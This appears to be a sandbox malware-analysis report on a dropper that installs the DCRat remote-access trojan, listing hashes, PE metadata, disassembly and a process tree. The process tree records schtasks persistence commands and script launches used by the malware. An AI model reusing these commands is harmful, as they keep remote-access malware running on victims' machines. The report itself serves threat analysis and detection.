              Encrypted:false
              SSDEEP:12:wgBmm/UmhFhZ6ojyn67J7L0e/M+Cdi/uv29eq9vjxQLPYTmt2zCI6fzaja:VQgUmj/htJ/0e/KdnvgvC7YTo86fzaW
              MD5:3A6A92C38B183CE031ADFA29BA644CDB
              SHA1:CF1B210C776ADD890A5EC07E5D1A199E5F25FC19
              SHA-256:6AEC6ADBE80CEA4847E64111C9E8115766737C608D3840F8C35864195B4EA6F2
              SHA-512:6D5B659B36E9E39FD99DCB565B746EDC0A6E418C99E7C2EB3468473B4ADF62C58C33E09FEE42BE6C6C6D9FFAFC4504131A50F4D690848C396336D72EA7D83434
              Malicious:false
              Preview:bkZEOZhekx6JdVVI1Dy4uOnOPwmPyPZJefgWqnyzQ2OFdETMPOf2fq5N7KycwSqVYwo8z9cOO9n29hvLca9juhoyjSZfyWC8L3qraVXQvRnfCDOZZn9WSGl0IzZgj6Z27oqF1EuHDtxd3IvgEAGKWqqESzik60qz1uiYXIiU22TiTH69D2cizPgQ8lxBfKKMC8mJjXI5cvRdXHvK2igDXH9lOSZvVgzsrGgUfxaqtgGD7C30zmI6nHy48A4R7Xk56jwRlbpFI0T1B6oMYj6sY2FjRlWf3IsW6LHYPmOY7Dyxy73CWr2Yb1gEdMAAEKL9H64zzP6wUhvVDRvTsUILPU5FoD4DlOTx1yp1CDNGvGD3GKALaqSuB9txBzKwU3KGN7ePm4QoHCaJQB8eCsm55jw1F1zN2bv156pIqvjgann9jkg90qtmRPLoLmJuEDvqQjNUW0xRJGfR6xSeU0WMrJkqvB6ElybW27s9WMnA3bcKu3sYTpaNrj8G8hiU3sqUoIZ8ESHINWSQrZ62Tiu5YNpS9mBznTGKuHgldtTAhRAURrZjkqAU8v6adG9bRRf4PIfj2VYkOtXGMUBRNbP6SvM9LFHWt2tQwGFILzqPSaGOXzNJFsOzCild5gYwNB1WAHUGP2FXv9o2p8mV28RAo3NOflNpb3CRitNPfH4M

              C:\winSaves\fontsavesbroker.exe

              Download File
              Process:C:\Users\user\Desktop\j0GOUGjcJD.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):847872
              Entropy (8bit):6.080640642128486
              Encrypted:false
              SSDEEP:12288:8DTblYiD2UQavcM7pokcJJgyJrQEi20MeIl2JPpTK8R+TBP:4lYiD2UQCmkcJJ1iul2LTK8R+TBP
              MD5:173D5AC0A5C8FBF0A3990DFD33A329B5
              SHA1:479DD85A5921FA5D0DE0CD164FCC626791634ADE
              SHA-256:57FB0DEF3DF546AA3FC26CA768A66BB79F120BACE0ED7474E0C65003CF96DC12
              SHA-512:558CE6EB0ACA76EF003DE2A19ECE63F4B5854BF927DECCBBF939A4ABE4F8233B155D839892837261FAC2B2A71B33BA25D456F776144C3980F076ECD9A64D7BEE
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 88%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

              \Device\Null

              Download File
              Process:C:\Windows\System32\w32tm.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):151
              Entropy (8bit):4.845173476047131
              Encrypted:false
              SSDEEP:3:VLV993J+miJWEoJ8FXyUVKXz5/Ec/I6vo7Y5qvj:Vx993DEUEVwtAFz
              MD5:9842872DC799B57C26CFC05FA95259F6
              SHA1:B47344BEAD5DCBE291BCF2A8C75E63AD65EC1D39
              SHA-256:0442B9684070AADBD966116A799102E741E0F8B722DCC69B02406FC1B49C7F45
              SHA-512:692C8D8E625229EFF6C188A57E2713C0F43ABAE9C5783630211B67C022A4AF1B09F081625D60C7E00DE1DA79404B2EBAB3CC33CAD3CA3CB46F4F5B9811AD7E97
              Malicious:false
              Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 02/10/2024 13:39:20..13:39:20, error: 0x80072746.13:39:25, error: 0x80072746.

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):6.305118116386212
              TrID:
              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
              • Win32 Executable (generic) a (10002005/4) 49.97%
              • Generic Win/DOS Executable (2004/3) 0.01%
              • DOS Executable Generic (2002/1) 0.01%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:j0GOUGjcJD.exe
              File size:1'141'873 bytes
              MD5:2b577aea211c0031d052f521c6d5c0ec
              SHA1:7cf36171d6c2dae4646132b6ebafd00bf6a38892
              SHA256:acbf2913aa4a2385d29179f5a9c0add2fff6bb34adab4669d02793a5c1317cc9
              SHA512:c6d925af572352dc833168d03917ded04d0f932ef7e92c398287b9945eb2edf8bb6073c346b09ae1fe0197134b5bbdda5bc8b241541d5f88f8161174700731f6
              SSDEEP:24576:B2G/nvxW3Wfn9lYiD2UQCmkcJJ1iul2LTK8R+TBPu:BbA3e9l5Dvmkqi02eW
              TLSH:9F3549017E448A12F0191673C2EF851847B4EC512BA6E32B7EB9777E6512393BD1CACB
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..

              File Icon

              Icon Hash:072b44052b970e0d

              Static PE Info

              General

              Entrypoint:0x41ec40
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Time Stamp:0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:5
              OS Version Minor:1
              File Version Major:5
              File Version Minor:1
              Subsystem Version Major:5
              Subsystem Version Minor:1
              Import Hash:fcf1390e9ce472c7270447fc5c61a0c1

              Entrypoint Preview

              Instruction
              call 00007FECA4EBF289h
              jmp 00007FECA4EBEC9Dh
              cmp ecx, dword ptr [0043E668h]
              jne 00007FECA4EBEE15h
              ret
              jmp 00007FECA4EBF40Eh
              int3
              int3
              int3
              int3
              int3
              push ebp
              mov ebp, esp
              push esi
              push dword ptr [ebp+08h]
              mov esi, ecx
              call 00007FECA4EB1BA7h
              mov dword ptr [esi], 00435580h
              mov eax, esi
              pop esi
              pop ebp
              retn 0004h
              and dword ptr [ecx+04h], 00000000h
              mov eax, ecx
              and dword ptr [ecx+08h], 00000000h
              mov dword ptr [ecx+04h], 00435588h
              mov dword ptr [ecx], 00435580h
              ret
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              lea eax, dword ptr [ecx+04h]
              mov dword ptr [ecx], 00435568h
              push eax
              call 00007FECA4EC1FADh
              pop ecx
              ret
              push ebp
              mov ebp, esp
              sub esp, 0Ch
              lea ecx, dword ptr [ebp-0Ch]
              call 00007FECA4EB1B3Eh
              push 0043B704h
              lea eax, dword ptr [ebp-0Ch]
              push eax
              call 00007FECA4EC16C2h
              int3
              push ebp
              mov ebp, esp
              sub esp, 0Ch
              lea ecx, dword ptr [ebp-0Ch]
              call 00007FECA4EBEDB4h
              push 0043B91Ch
              lea eax, dword ptr [ebp-0Ch]
              push eax
              call 00007FECA4EC16A5h
              int3
              jmp 00007FECA4EC36F3h
              jmp dword ptr [00433260h]
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              push 00421EB0h
              push dword ptr fs:[00000000h]

              Rich Headers

              Programming Language:
              • [ C ] VS2008 SP1 build 30729
              • [IMP] VS2008 SP1 build 30729
              • [C++] VS2015 UPD3.1 build 24215
              • [EXP] VS2015 UPD3.1 build 24215
              • [RES] VS2015 UPD3 build 24213
              • [LNK] VS2015 UPD3.1 build 24215

              Data Directories

              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x3c8200x34.rdata
              IMAGE_DIRECTORY_ENTRY_IMPORT0x3c8540x3c.rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x630000x8474.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x6c0000x2268.reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG0x3aac00x54.rdata
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355080x40.rdata
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x330000x260.rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3bdc40x120.rdata
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

              Sections

              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x310ea0x31200c5bf61bbedb6ad471e9dc6266398e965False0.583959526081425data6.708075396341128IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rdata0x330000xa6120xa8007980b588d5b28128a2f3c36cabe2ce98False0.45284598214285715data5.221742709250668IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data0x3e0000x237280x1000201530c9e56f172adf2473053298d48fFalse0.36767578125data3.7088186669877685IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .didat0x620000x1880x200c5d41d8f254f69e567595ab94266cfdcFalse0.4453125data3.2982538067961342IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc0x630000x84740x8600f0fb3cb5a18258d71172e80f538390ffFalse0.43234025186567165data4.620184056545728IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .reloc0x6c0000x22680x2400c7a942b723cb29d9c02f7c611b544b50False0.7681206597222222data6.5548620101740545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

              Resources

              NameRVASizeTypeLanguageCountryZLIB Complexity
              PNG0x635840xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
              PNG0x640cc0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
              RT_ICON0x656780x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.3129432624113475
              RT_ICON0x65ae00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.2129455909943715
              RT_ICON0x66b880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.16981327800829876
              RT_DIALOG0x691300x286dataEnglishUnited States0.5092879256965944
              RT_DIALOG0x693b80x13adataEnglishUnited States0.60828025477707
              RT_DIALOG0x694f40xecdataEnglishUnited States0.6991525423728814
              RT_DIALOG0x695e00x12edataEnglishUnited States0.5927152317880795
              RT_DIALOG0x697100x338dataEnglishUnited States0.45145631067961167
              RT_DIALOG0x69a480x252dataEnglishUnited States0.5757575757575758
              RT_STRING0x69c9c0x1e2dataEnglishUnited States0.3900414937759336
              RT_STRING0x69e800x1ccdataEnglishUnited States0.4282608695652174
              RT_STRING0x6a04c0x1b8dataEnglishUnited States0.45681818181818185
              RT_STRING0x6a2040x146dataEnglishUnited States0.5153374233128835
              RT_STRING0x6a34c0x446dataEnglishUnited States0.340036563071298
              RT_STRING0x6a7940x166dataEnglishUnited States0.49162011173184356
              RT_STRING0x6a8fc0x152dataEnglishUnited States0.5059171597633136
              RT_STRING0x6aa500x10adataEnglishUnited States0.49624060150375937
              RT_STRING0x6ab5c0xbcdataEnglishUnited States0.6329787234042553
              RT_STRING0x6ac180xd6dataEnglishUnited States0.5747663551401869
              RT_GROUP_ICON0x6acf00x30data0.8125
              RT_MANIFEST0x6ad200x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

              Imports

              DLLImport
              KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
              gdiplus.dllGdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

              Possible Origin

              Language of compilation systemCountry where language is spokenMap
              EnglishUnited States

              Network Behavior

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Oct 2, 2024 17:54:41.180674076 CEST53559611.1.1.1192.168.2.4
              Oct 2, 2024 17:54:55.774367094 CEST53565311.1.1.1192.168.2.4

              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              High Level Behavior Distribution

              Click to dive into process behavior distribution

              Behavior

              Click to jump to process

              System Behavior

              General

              Target ID:0
              Start time:11:53:53
              Start date:02/10/2024
              Path:C:\Users\user\Desktop\j0GOUGjcJD.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\j0GOUGjcJD.exe"
              Imagebase:0x4d0000
              File size:1'141'873 bytes
              MD5 hash:2B577AEA211C0031D052F521C6D5C0EC
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low
              Has exited:true

              General

              Target ID:1
              Start time:11:53:54
              Start date:02/10/2024
              Path:C:\Windows\SysWOW64\wscript.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\System32\WScript.exe" "C:\winSaves\0VySiddKAXOECI1ul.vbe"
              Imagebase:0x7e0000
              File size:147'456 bytes
              MD5 hash:FF00E0480075B095948000BDC66E81F0
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:2
              Start time:11:54:04
              Start date:02/10/2024
              Path:C:\Windows\SysWOW64\cmd.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\system32\cmd.exe /c ""C:\winSaves\UEmczQViUsQALT5sK5Im3o.bat" "
              Imagebase:0x240000
              File size:236'544 bytes
              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:3
              Start time:11:54:04
              Start date:02/10/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7699e0000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:4
              Start time:11:54:04
              Start date:02/10/2024
              Path:C:\winSaves\fontsavesbroker.exe
              Wow64 process (32bit):false
              Commandline:"C:\winSaves\fontsavesbroker.exe"
              Imagebase:0xa20000
              File size:847'872 bytes
              MD5 hash:173D5AC0A5C8FBF0A3990DFD33A329B5
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1802058996.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1802058996.0000000002EE3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              Antivirus matches:
              • Detection: 100%, Avira
              • Detection: 100%, Joe Sandbox ML
              • Detection: 88%, ReversingLabs
              Reputation:low
              Has exited:true

              General

              Target ID:5
              Start time:11:54:05
              Start date:02/10/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 13 /tr "'C:\Windows\Cursors\SearchApp.exe'" /f
              Imagebase:0x7ff76f990000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:6
              Start time:11:54:05
              Start date:02/10/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Windows\Cursors\SearchApp.exe'" /rl HIGHEST /f
              Imagebase:0x7ff76f990000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:7
              Start time:11:54:05
              Start date:02/10/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 8 /tr "'C:\Windows\Cursors\SearchApp.exe'" /rl HIGHEST /f
              Imagebase:0x7ff76f990000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:8
              Start time:11:54:05
              Start date:02/10/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "TGdhCspOsuwHWHVRmOneCNdUUqTST" /sc MINUTE /mo 11 /tr "'C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe'" /f
              Imagebase:0x7ff76f990000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:9
              Start time:11:54:05
              Start date:02/10/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "TGdhCspOsuwHWHVRmOneCNdUUqTS" /sc ONLOGON /tr "'C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe'" /rl HIGHEST /f
              Imagebase:0x7ff76f990000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:10
              Start time:11:54:05
              Start date:02/10/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "TGdhCspOsuwHWHVRmOneCNdUUqTST" /sc MINUTE /mo 13 /tr "'C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe'" /rl HIGHEST /f
              Imagebase:0x7ff76f990000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:11
              Start time:11:54:06
              Start date:02/10/2024
              Path:C:\Windows\System32\cmd.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\vxPvY9xhrB.bat"
              Imagebase:0x7ff7f4c20000
              File size:289'792 bytes
              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:12
              Start time:11:54:06
              Start date:02/10/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7699e0000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              General

              Target ID:13
              Start time:11:54:06
              Start date:02/10/2024
              Path:C:\Windows\System32\w32tm.exe
              Wow64 process (32bit):false
              Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
              Imagebase:0x7ff68f970000
              File size:108'032 bytes
              MD5 hash:81A82132737224D324A3E8DA993E2FB5
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              General

              Target ID:16
              Start time:11:54:06
              Start date:02/10/2024
              Path:C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe
              Wow64 process (32bit):false
              Commandline:C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe
              Imagebase:0xb30000
              File size:847'872 bytes
              MD5 hash:173D5AC0A5C8FBF0A3990DFD33A329B5
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000010.00000002.1890656655.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000010.00000002.1890656655.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000010.00000002.1890656655.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              Antivirus matches:
              • Detection: 100%, Avira
              • Detection: 100%, Joe Sandbox ML
              • Detection: 88%, ReversingLabs
              Has exited:true

              General

              Target ID:17
              Start time:11:54:07
              Start date:02/10/2024
              Path:C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe
              Wow64 process (32bit):false
              Commandline:C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe
              Imagebase:0xc80000
              File size:847'872 bytes
              MD5 hash:173D5AC0A5C8FBF0A3990DFD33A329B5
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000011.00000002.1891516685.000000000303E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000011.00000002.1891516685.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              Has exited:true

              General

              Target ID:19
              Start time:11:54:11
              Start date:02/10/2024
              Path:C:\winSaves\fontsavesbroker.exe
              Wow64 process (32bit):false
              Commandline:"C:\winSaves\fontsavesbroker.exe"
              Imagebase:0x5c0000
              File size:847'872 bytes
              MD5 hash:173D5AC0A5C8FBF0A3990DFD33A329B5
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000013.00000002.1933324919.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000013.00000002.1933324919.0000000002A98000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              Has exited:true

              Disassembly

              Reset < >

                Execution Graph

                Execution Coverage:9.8%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:9.2%
                Total number of Nodes:1506
                Total number of Limit Nodes:25
                execution_graph 24807 4ed34e DialogBoxParamW 24756 4e8c40 GetClientRect 24757 4eec40 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 24758 4f3040 5 API calls 2 library calls 24808 4ebe49 98 API calls 3 library calls 24759 500040 IsProcessorFeaturePresent 22830 4edc5d 22831 4edc2e 22830->22831 22833 4edf59 22831->22833 22861 4edc67 22833->22861 22835 4edf73 22836 4edfd0 22835->22836 22850 4edff4 22835->22850 22837 4eded7 DloadReleaseSectionWriteAccess 11 API calls 22836->22837 22838 4edfdb RaiseException 22837->22838 22839 4ee1c9 22838->22839 22880 4eec4a 22839->22880 22840 4ee06c LoadLibraryExA 22842 4ee07f GetLastError 22840->22842 22843 4ee0cd 22840->22843 22846 4ee0a8 22842->22846 22847 4ee092 22842->22847 22845 4ee0d8 FreeLibrary 22843->22845 22849 4ee0df 22843->22849 22844 4ee1d8 22844->22831 22845->22849 22852 4eded7 DloadReleaseSectionWriteAccess 11 API calls 22846->22852 22847->22843 22847->22846 22848 4ee13d GetProcAddress 22851 4ee14d GetLastError 22848->22851 22856 4ee19b 22848->22856 22849->22848 22849->22856 22850->22840 22850->22843 22850->22849 22850->22856 22853 4ee160 22851->22853 22855 4ee0b3 RaiseException 22852->22855 22853->22856 22857 4eded7 DloadReleaseSectionWriteAccess 11 API calls 22853->22857 22855->22839 22872 4eded7 22856->22872 22858 4ee181 RaiseException 22857->22858 22859 4edc67 ___delayLoadHelper2@8 11 API calls 22858->22859 22860 4ee198 22859->22860 22860->22856 22862 4edc99 22861->22862 22863 4edc73 22861->22863 22862->22835 22887 4edd15 22863->22887 22866 4edc94 22897 4edc9a 22866->22897 22869 4eec4a _ValidateLocalCookies 5 API calls 22870 4edf55 22869->22870 22870->22835 22871 4edf24 22871->22869 22873 4edf0b 22872->22873 22874 4edee9 22872->22874 22873->22839 22875 4edd15 DloadLock 8 API calls 22874->22875 22876 4edeee 22875->22876 22877 4edf06 22876->22877 22878 4ede67 DloadProtectSection 3 API calls 22876->22878 22906 4edf0f 8 API calls 2 library calls 22877->22906 22878->22877 22881 4eec55 IsProcessorFeaturePresent 22880->22881 22882 4eec53 22880->22882 22884 4ef267 22881->22884 22882->22844 22907 4ef22b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 22884->22907 22886 4ef34a 22886->22844 22888 4edc9a DloadLock 3 API calls 22887->22888 22889 4edd2a 22888->22889 22890 4eec4a _ValidateLocalCookies 5 API calls 22889->22890 22891 4edc78 22890->22891 22891->22866 22892 4ede67 22891->22892 22893 4ede7c DloadObtainSection 22892->22893 22894 4edeb7 VirtualProtect 22893->22894 22895 4ede82 22893->22895 22905 4edd72 VirtualQuery GetSystemInfo 22893->22905 22894->22895 22895->22866 22898 4edcab 22897->22898 22899 4edca7 22897->22899 22900 4edcaf 22898->22900 22901 4edcb3 GetModuleHandleW 22898->22901 22899->22871 22900->22871 22902 4edcc9 GetProcAddress 22901->22902 22904 4edcc5 22901->22904 22903 4edcd9 GetProcAddress 22902->22903 22902->22904 22903->22904 22904->22871 22905->22894 22906->22873 22907->22886 22908 4d9b59 22911 4d9bd7 22908->22911 22912 4d9b63 